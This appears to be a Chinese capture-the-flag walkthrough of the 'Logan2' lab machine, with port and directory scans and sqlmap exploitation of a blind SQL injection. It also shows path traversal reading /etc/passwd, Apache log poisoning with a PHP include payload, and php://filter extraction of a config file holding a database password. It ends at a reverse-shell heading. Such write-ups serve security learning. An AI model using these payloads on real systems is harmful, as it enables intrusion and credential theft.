![\"image-20240417195609809\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241775.png\")
<\/div>\n
![\"image-20240417195818979\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241776.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nrustscan -a 192.168.0.145 -- -A<\/code><\/pre>\nOpen 192.168.0.145:22\nOpen 192.168.0.145:80\nOpen 192.168.0.145:3000\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)\n| ssh-hostkey: \n| 256 10:ed:dd:ab:26:fd:f4:9f:28:1e:89:93:f4:58:16:ab (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDnjhFrlAMi06UbJbqL8vCRNan3Azij63mLg\/jbysc+PqRxSiiCv1\/imcjikQLi5SnnyY\/\/gRLa0EJz1D7kLWqk=\n| 256 43:3b:d9:8c:12:44:e9:92:be:cf:1a:78:fd:33:38:67 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIIyIpQI1VgDg\/IXP7Y+NR\/aiAmqxd5KGk\/ZQ8fL77eu\n80\/tcp open http syn-ack Apache httpd 2.4.57 ((Debian))\n| http-methods: \n|_ Supported Methods: POST OPTIONS HEAD GET\n|_http-server-header: Apache\/2.4.57 (Debian)\n|_http-title: Logan\n3000\/tcp open ppp? syn-ack\n| fingerprint-strings: \n| GenericLines, Help: \n| HTTP\/1.1 400 Bad Request\n| Content-Type: text\/plain; charset=utf-8\n| Connection: close\n| Request\n| GetRequest: \n| HTTP\/1.0 200 OK\n| Content-Type: text\/html; charset=UTF-8\n| Set-Cookie: lang=en-US; Path=\/; Max-Age=2147483647\n| Set-Cookie: i_like_gitea=ba7e7fac344f9195; Path=\/; HttpOnly\n| Set-Cookie: _csrf=LpphfML50jUpPn12TIh6yHGf2oI6MTcxMzM1NTE0Mzk4MDMxNzQ0Mw; Path=\/; Expires=Thu, 18 Apr 2024 11:59:03 GMT; HttpOnly\n| X-Frame-Options: SAMEORIGIN\n| Date: Wed, 17 Apr 2024 11:59:03 GMT\n| <!DOCTYPE html>\n| <html lang="en-US" class="theme-">\n| <head data-suburl="">\n| <meta charset="utf-8">\n| <meta name="viewport" content="width=device-width, initial-scale=1">\n| <meta http-equiv="x-ua-compatible" content="ie=edge">\n| <title> Gitea: Git with a cup of tea <\/title>\n| <link rel="manifest" href="\/manifest.json" crossorigin="use-credentials">\n| <meta name="theme-color" content="#6cc644">\n| <meta name="author" content="Gitea - Git with a cup of tea" \/>\n| <meta name="description" content="Gitea (Git with a cup of tea) is a painless\n| HTTPOptions: \n| HTTP\/1.0 404 Not Found\n| Content-Type: text\/html; charset=UTF-8\n| Set-Cookie: lang=en-US; Path=\/; Max-Age=2147483647\n| Set-Cookie: i_like_gitea=e5135b915582dadc; Path=\/; HttpOnly\n| Set-Cookie: _csrf=R4IXxzou684SHeT6Qv1ovgfY0oQ6MTcxMzM1NTE0OTAxNTMwNTM4Nw; Path=\/; Expires=Thu, 18 Apr 2024 11:59:09 GMT; HttpOnly\n| X-Frame-Options: SAMEORIGIN\n| Date: Wed, 17 Apr 2024 11:59:09 GMT\n| <!DOCTYPE html>\n| <html lang="en-US" class="theme-">\n| <head data-suburl="">\n| <meta charset="utf-8">\n| <meta name="viewport" content="width=device-width, initial-scale=1">\n| <meta http-equiv="x-ua-compatible" content="ie=edge">\n| <title>Page Not Found - Gitea: Git with a cup of tea <\/title>\n| <link rel="manifest" href="\/manifest.json" crossorigin="use-credentials">\n| <meta name="theme-color" content="#6cc644">\n| <meta name="author" content="Gitea - Git with a cup of tea" \/>\n|_ <meta name="description" content="Gitea (Git with a c\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port3000-TCP:V=7.94SVN%I=7%D=4\/17%Time=661FB988%P=x86_64-pc-linux-gnu%r\nSF:(GenericLines,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x\nSF:20text\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Ba\nSF:d\\x20Request")%r(GetRequest,2942,"HTTP\/1\\.0\\x20200\\x20OK\\r\\nContent-Typ\nSF:e:\\x20text\/html;\\x20charset=UTF-8\\r\\nSet-Cookie:\\x20lang=en-US;\\x20Path\nSF:=\/;\\x20Max-Age=2147483647\\r\\nSet-Cookie:\\x20i_like_gitea=ba7e7fac344f91\nSF:95;\\x20Path=\/;\\x20HttpOnly\\r\\nSet-Cookie:\\x20_csrf=LpphfML50jUpPn12TIh6\nSF:yHGf2oI6MTcxMzM1NTE0Mzk4MDMxNzQ0Mw;\\x20Path=\/;\\x20Expires=Thu,\\x2018\\x2\nSF:0Apr\\x202024\\x2011:59:03\\x20GMT;\\x20HttpOnly\\r\\nX-Frame-Options:\\x20SAM\nSF:EORIGIN\\r\\nDate:\\x20Wed,\\x2017\\x20Apr\\x202024\\x2011:59:03\\x20GMT\\r\\n\\r\\\nSF:n<!DOCTYPE\\x20html>\\n<html\\x20lang=\\"en-US\\"\\x20class=\\"theme-\\">\\n<hea\nSF:d\\x20data-suburl=\\"\\">\\n\\t<meta\\x20charset=\\"utf-8\\">\\n\\t<meta\\x20name=\nSF:\\"viewport\\"\\x20content=\\"width=device-width,\\x20initial-scale=1\\">\\n\\t\nSF:<meta\\x20http-equiv=\\"x-ua-compatible\\"\\x20content=\\"ie=edge\\">\\n\\t<tit\nSF:le>\\x20Gitea:\\x20Git\\x20with\\x20a\\x20cup\\x20of\\x20tea\\x20<\/title>\\n\\t<l\nSF:ink\\x20rel=\\"manifest\\"\\x20href=\\"\/manifest\\.json\\"\\x20crossorigin=\\"us\nSF:e-credentials\\">\\n\\t<meta\\x20name=\\"theme-color\\"\\x20content=\\"#6cc644\\\nSF:">\\n\\t<meta\\x20name=\\"author\\"\\x20content=\\"Gitea\\x20-\\x20Git\\x20with\\x\nSF:20a\\x20cup\\x20of\\x20tea\\"\\x20\/>\\n\\t<meta\\x20name=\\"description\\"\\x20con\nSF:tent=\\"Gitea\\x20\\(Git\\x20with\\x20a\\x20cup\\x20of\\x20tea\\)\\x20is\\x20a\\x20\nSF:painless")%r(Help,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Typ\nSF:e:\\x20text\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x\nSF:20Bad\\x20Request")%r(HTTPOptions,206C,"HTTP\/1\\.0\\x20404\\x20Not\\x20Found\nSF:\\r\\nContent-Type:\\x20text\/html;\\x20charset=UTF-8\\r\\nSet-Cookie:\\x20lang\nSF:=en-US;\\x20Path=\/;\\x20Max-Age=2147483647\\r\\nSet-Cookie:\\x20i_like_gitea\nSF:=e5135b915582dadc;\\x20Path=\/;\\x20HttpOnly\\r\\nSet-Cookie:\\x20_csrf=R4IXx\nSF:zou684SHeT6Qv1ovgfY0oQ6MTcxMzM1NTE0OTAxNTMwNTM4Nw;\\x20Path=\/;\\x20Expire\nSF:s=Thu,\\x2018\\x20Apr\\x202024\\x2011:59:09\\x20GMT;\\x20HttpOnly\\r\\nX-Frame-\nSF:Options:\\x20SAMEORIGIN\\r\\nDate:\\x20Wed,\\x2017\\x20Apr\\x202024\\x2011:59:0\nSF:9\\x20GMT\\r\\n\\r\\n<!DOCTYPE\\x20html>\\n<html\\x20lang=\\"en-US\\"\\x20class=\\"\nSF:theme-\\">\\n<head\\x20data-suburl=\\"\\">\\n\\t<meta\\x20charset=\\"utf-8\\">\\n\\\nSF:t<meta\\x20name=\\"viewport\\"\\x20content=\\"width=device-width,\\x20initial\nSF:-scale=1\\">\\n\\t<meta\\x20http-equiv=\\"x-ua-compatible\\"\\x20content=\\"ie=\nSF:edge\\">\\n\\t<title>Page\\x20Not\\x20Found\\x20-\\x20\\x20Gitea:\\x20Git\\x20wit\nSF:h\\x20a\\x20cup\\x20of\\x20tea\\x20<\/title>\\n\\t<link\\x20rel=\\"manifest\\"\\x20\nSF:href=\\"\/manifest\\.json\\"\\x20crossorigin=\\"use-credentials\\">\\n\\t<meta\\x\nSF:20name=\\"theme-color\\"\\x20content=\\"#6cc644\\">\\n\\t<meta\\x20name=\\"autho\nSF:r\\"\\x20content=\\"Gitea\\x20-\\x20Git\\x20with\\x20a\\x20cup\\x20of\\x20tea\\"\\x\nSF:20\/>\\n\\t<meta\\x20name=\\"description\\"\\x20content=\\"Gitea\\x20\\(Git\\x20wi\nSF:th\\x20a\\x20c");\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.145\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.0.145\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,zip,git,jpg,txt,png\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php (Status: 403) [Size: 278]\n\/javascript (Status: 301) [Size: 319] [--> http:\/\/192.168.0.145\/javascript\/]\n\/config.php (Status: 200) [Size: 0]\n\/.php (Status: 403) [Size: 278]\n\/server-status (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ sudo dirsearch -u http:\/\/192.168.0.145:3000\/ -e* -i 200,300-399 2>\/dev\/null\n\n _|. _ _ _ _ _ _|_ v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\n\nOutput File: \/home\/kali\/temp\/Logan2\/reports\/http_192.168.0.145_3000\/__24-04-17_08-03-00.txt\n\nTarget: http:\/\/192.168.0.145:3000\/\n\n[08:03:00] Starting: \n[08:03:00] 302 - 26B - \/js -> \/js\n[08:04:25] 302 - 27B - \/css -> \/css\n[08:04:27] 200 - 160B - \/debug\n[08:04:27] 200 - 160B - \/debug\/\n[08:04:38] 302 - 29B - \/fonts -> \/fonts\n[08:04:47] 302 - 27B - \/img -> \/img\n[08:05:03] 200 - 670B - \/manifest.json\n[08:05:36] 200 - 9KB - \/user\/login\/<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\nWelcome!!!<\/code><\/pre>\n![\"image-20240417200155353\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div>
\n<\/div>
\n<\/div><\/p>\n\u53d1\u73b0\u4e00\u4e2a\u811a\u672c\uff1a<\/p>\n
document.addEventListener("DOMContentLoaded", function() {\n fetch('\/save-user-agent.php', {\n method: 'POST',\n body: JSON.stringify({ user_agent: navigator.userAgent }),\n headers: {\n 'Content-Type': 'application\/json'\n }\n })\n .then(response => {\n if (response.ok) {\n console.log('User-Agent saved successfully.');\n } else {\n console.error('Error saving User-Agent.');\n }\n })\n .catch(error => {\n console.error('Network error:', error);\n });\n});\n<\/code><\/pre>\n\u9700\u8981\u6211\u4eec\u53d1\u9001POST\uff0c\u6293\u5305\u770b\u4e00\u4e0b\uff1a<\/p>\n
GET \/save-user-agent.php HTTP\/1.1\nHost: 192.168.0.145\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\nContent-Length: 23\n\n{\n "user_agent":"1"\n}<\/code><\/pre>\n\u662f\u6709\u6b63\u5e38\u56de\u5e94\u7684\uff1a<\/p>\n
HTTP\/1.1 200 OK\nDate: Wed, 17 Apr 2024 12:22:15 GMT\nServer: Apache\/2.4.57 (Debian)\nContent-Length: 0\nConnection: close\nContent-Type: text\/html; charset=UTF-8<\/code><\/pre>\nsqlmap\u7206\u7834<\/h3>\n
\u5c1d\u8bd5sqlmap\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ sqlmap sql.txt\n ___\n __H__\n ___ ___[.]_____ ___ ___ {1.8.2#stable}\n|_ -| . [(] | .'| . |\n|___|_ ["]_|_|_|__,| _|\n |_|V... |_| https:\/\/sqlmap.org\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting @ 08:23:38 \/2024-04-17\/\n\n[08:23:48] [CRITICAL] host 'sql.txt' does not exist\n\n[*] ending @ 08:23:48 \/2024-04-17\/<\/code><\/pre>\n\u76f4\u63a5\u641e\uff0c\u8bc6\u522b\u4e0d\u51fa\u6765\uff0c\u5c1d\u8bd5\u4f7f\u7528\u522b\u7684\u65b9\u6cd5\uff1a<\/p>\n
sqlmap --url http:\/\/192.168.0.145\/save-user-agent.php --method post --data '{"user_agent":"param"}' --batch<\/code><\/pre>\nsqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests:\n---\nParameter: JSON user_agent ((custom) POST)\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: {"user_agent":"param' AND (SELECT 7445 FROM (SELECT(SLEEP(5)))THpQ) AND 'rqhs'='rqhs"}\n---\n\nweb server operating system: Linux Debian\nweb application technology: Apache 2.4.57\nback-end DBMS: MySQL >= 5.0.12 (MariaDB fork)<\/code><\/pre>\nsqlmap --url http:\/\/192.168.0.145\/save-user-agent.php --method post --data '{"user_agent":"param"}' --batch --dbs<\/code><\/pre>\navailable databases [2]:\n[*] information_schema\n[*] logan<\/code><\/pre>\nsqlmap --url http:\/\/192.168.0.145\/save-user-agent.php --method post --data '{"user_agent":"param"}' --batch -D logan --tables<\/code><\/pre>\nDatabase: logan\n[3 tables]\n+----------+\n| browser |\n| comments |\n| users |\n+----------+<\/code><\/pre>\nsqlmap --url http:\/\/192.168.0.145\/save-user-agent.php --method post --data '{"user_agent":"param"}' --batch -D logan -T users --columns<\/code><\/pre>\nDatabase: logan\nTable: users\n[2 columns]\n+--------+--------------+\n| Column | Type |\n+--------+--------------+\n| user | varchar(255) |\n| email | varchar(255) |\n+--------+--------------+<\/code><\/pre>\nsqlmap --url http:\/\/192.168.0.145\/save-user-agent.php --method post --data '{"user_agent":"param"}' --batch -D logan -T users --dump<\/code><\/pre>\nDatabase: logan\nTable: users\n[1 entry]\n+------------------------------+--------+\n| email | user |\n+------------------------------+--------+\n| logan@newsitelogan.logan.hmv | logan |\n+------------------------------+--------+<\/code><\/pre>\n\u6dfb\u52a0dns\u89e3\u6790<\/h3>\n
\u53d1\u73b0\u4e86\u4e00\u4e2adns\u89e3\u6790\uff1a<\/p>\n
192.168.0.145 newsitelogan.logan.hmv<\/code><\/pre>\n<\/div><\/p>\n\u5230\u5904\u770b\u770b\uff0c\u6e90\u4ee3\u7801\u53d1\u73b0\uff1a<\/p>\n
<!-- THE OLD WEBSITE WAS VERY UGLY LUCKILY WE HIRED NEW DESIGNERS -->\n.......\n<!-- <img class="space-image" src="\/photos-website-logan.php?photo=moon.png"> -->\n.......\n<!-- <img class="space-image" src="\/photos-website-logan.php?photo=mars.jpg"> -->\n.......\n<!-- <img class="space-image" src="\/photos-website-logan.php?photo=pleyades.jpg"> --><\/code><\/pre>\n\u5c1d\u8bd5\u662f\u5426\u662fLFT\u6f0f\u6d1e\uff1a<\/p>\n
http:\/\/newsitelogan.logan.hmv\/\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/etc\/passwd<\/code><\/pre>\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:108:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nlogan:x:1000:1000:logan,,,:\/home\/logan:\/bin\/bash\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\nmysql:x:103:112:MySQL Server,,,:\/nonexistent:\/bin\/false\ngit:x:104:113:Git Version Control,,,:\/home\/git:\/bin\/bash\nkevin:x:1001:1001:kevin,,,:\/home\/kevin:\/bin\/bash<\/code><\/pre>\n\u65e5\u5fd7\u6ce8\u5165<\/h3>\n
\u67e5\u770b\u53d1\u73b0apache<\/code>\u7684\u65e5\u5fd7\u662f\u5f00\u542f\u7684\uff1a<\/p>\nhttp:\/\/newsitelogan.logan.hmv\/\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/var\/log\/apache2\/access.log<\/code><\/pre>\nLogs are cleaned every minut\n192.168.0.143 - - [17\/Apr\/2024:07:54:12 -0500] "GET \/\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/etc\/shadow HTTP\/1.1" 200 203 "http:\/\/newsitelogan.logan.hmv\/\/photos-website-logan.php?photo=\/config.php" "Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0"\n192.168.0.143 - - [17\/Apr\/2024:07:54:19 -0500] "GET \/\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/etc\/passwd HTTP\/1.1" 200 765 "http:\/\/newsitelogan.logan.hmv\/\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/etc\/shadow" "Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0"\n........<\/code><\/pre>\n\u5c1d\u8bd5\u4f7f\u7528\u4f2a\u534f\u8bae\u8fdb\u884c\u8bfb\u53d6\uff0c\u4f46\u662f\u5931\u8d25\u4e86\u3002<\/p>\n
\u5c1d\u8bd5\u4fee\u6539user-agent<\/code>\u4f20\u4e00\u4e2a\u8bd5\u8bd5\uff1a<\/p>\n<\/div>
\n<\/div><\/p>\n\u627e\u5230\u7981\u7528\u51fd\u6570\uff1a<\/p>\n
\u5c1d\u8bd5\u4f7f\u7528include()<\/code>\u8fdb\u884c\u7ed5\u8fc7\uff1a<\/p>\nUser-Agent:<?php include($_GET['hack']);?><\/code><\/pre>\n<\/div><\/p>\nhttp:\/\/newsitelogan.logan.hmv\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/..\/var\/log\/apache2\/access.log&hack=..\/..\/..\/..\/..\/..\/etc\/passwd\n<?php include($_GET['hack']);?><\/code><\/pre>\n\u5c1d\u8bd5\u83b7\u53d6\u914d\u7f6e\u6587\u4ef6\uff0c\u56e0\u4e3a\u4e00\u5206\u949f\u6e05\u7406\u4e00\u6b21\uff0c\u6240\u4ee5\u8981\u4e00\u6c14\u5475\u6210\uff1a<\/p>\n
http:\/\/newsitelogan.logan.hmv\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/..\/var\/log\/apache2\/access.log&hack=php:\/\/filter\/convert.base64-encode\/resource=\/etc\/passwd<\/code><\/pre>\n<\/div><\/p>\ncm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovcnVuL2lyY2Q6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjQyOjY1NTM0Ojovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4Kbm9ib2R5Ong6NjU1MzQ6NjU1MzQ6bm9ib2R5Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzeXN0ZW1kLW5ldHdvcms6eDo5OTg6OTk4OnN5c3RlbWQgTmV0d29yayBNYW5hZ2VtZW50Oi86L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMDoxMDc6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgphdmFoaS1hdXRvaXBkOng6MTAxOjEwODpBdmFoaSBhdXRvaXAgZGFlbW9uLCwsOi92YXIvbGliL2F2YWhpLWF1dG9pcGQ6L3Vzci9zYmluL25vbG9naW4KbG9nYW46eDoxMDAwOjEwMDA6bG9nYW4sLCw6L2hvbWUvbG9nYW46L2Jpbi9iYXNoCnNzaGQ6eDoxMDI6NjU1MzQ6Oi9ydW4vc3NoZDovdXNyL3NiaW4vbm9sb2dpbgpteXNxbDp4OjEwMzoxMTI6TXlTUUwgU2VydmVyLCwsOi9ub25leGlzdGVudDovYmluL2ZhbHNlCmdpdDp4OjEwNDoxMTM6R2l0IFZlcnNpb24gQ29udHJvbCwsLDovaG9tZS9naXQ6L2Jpbi9iYXNoCmtldmluOng6MTAwMToxMDAxOmtldmluLCwsOi9ob21lL2tldmluOi9iaW4vYmFzaAo<\/code><\/pre>\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:108:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nlogan:x:1000:1000:logan,,,:\/home\/logan:\/bin\/bash\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\nmysql:x:103:112:MySQL Server,,,:\/nonexistent:\/bin\/false\ngit:x:104:113:Git Version Control,,,:\/home\/git:\/bin\/bash\nkevin:x:1001:1001:kevin,,,:\/home\/kevin:\/bin\/bash<\/code><\/pre>\n\u8bf4\u660e\u662f\u6709\u7528\u7684\uff0c\u5c1d\u8bd5php_filter<\/code>\u94fe\u7684\u5229\u7528\uff0c\u4f46\u662f\u6ca1\u80fd\u5f39\u56de\u53bb\u3002\u67e5\u770b\u662f\u5426\u5b58\u5728\u5176\u4ed6\u914d\u7f6e\u6587\u4ef6\uff1a<\/p>\nhttp:\/\/newsitelogan.logan.hmv\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/..\/var\/log\/apache2\/access.log&hack=php:\/\/filter\/convert.base64-encode\/resource=config.php<\/code><\/pre>\nPD9waHAKCQoJJHNlcnZlcm5hbWUgPSAibG9jYWxob3N0IjsKCSR1c2VybmFtZSA9ICJsb2dhbiI7CgkkcGFzc3dvcmQgPSAiU3VwZXJfbG9nYW4xMjM0IjsKCSRkYm5hbWUgPSAibG9nYW4iOwoKCS8vIENyZWF0ZSBjb25uZWN0aW9uCgkkY29ubiA9IG5ldyBteXNxbGkoJHNlcnZlcm5hbWUsICR1c2VybmFtZSwgJHBhc3N3b3JkLCAkZGJuYW1lKTsKCS8vIENoZWNrIGNvbm5lY3Rpb24KCWlmICgkY29ubi0+Y29ubmVjdF9lcnJvcikgewoJICBkaWUoIkNvbm5lY3Rpb24gZmFpbGVkOiAiIC4gJGNvbm4tPmNvbm5lY3RfZXJyb3IpOwoJfQoKPz4K<\/code><\/pre>\n<?php\n\n $servername = "localhost";\n $username = "logan";\n $password = "Super_logan1234";\n $dbname = "logan";\n\n \/\/ Create connection\n $conn = new mysqli($servername, $username, $password, $dbname);\n \/\/ Check connection\n if ($conn->connect_error) {\n die("Connection failed: " . $conn->connect_error);\n }\n\n?><\/code><\/pre>\n\u767b\u5f55<\/h3>\n
\u83b7\u5f97\u8d26\u53f7\u5bc6\u7801\uff1a<\/p>\n
logan\nSuper_logan1234<\/code><\/pre>\n\u5c1d\u8bd5\u767b\u5f55\u51763000<\/code>\u7aef\u53e3\uff0c\u770b\u770b\u53ef\u4ee5\u767b\u5f55\u3002\u987a\u4fbf\u6d4b\u4e00\u4e0bssh\uff0c\u53d1\u73b0\u53ef\u4ee5\u6b63\u5e38\u767b\u5f55\u5230\u7aef\u53e3\u670d\u52a1\u4e2d\uff1a<\/p>\n<\/div><\/p>\n\u770b\u770b\u6709\u6ca1\u6709\u5730\u65b9\u53ef\u4ee5\u53cd\u5f39\u4e00\u4e2ashell\u56de\u6765\uff1a<\/p>\n
<\/div><\/p>\n\u53d1\u73b0\u57288000<\/code>\u7aef\u53e3\u6258\u7ba1\u4e86\u4e00\u4e2a\u670d\u52a1\u3002<\/p>\n\u65b9\u6cd5\u4e00\uff1agit\u4efb\u52a1\u53cd\u5f39shell<\/h3>\n
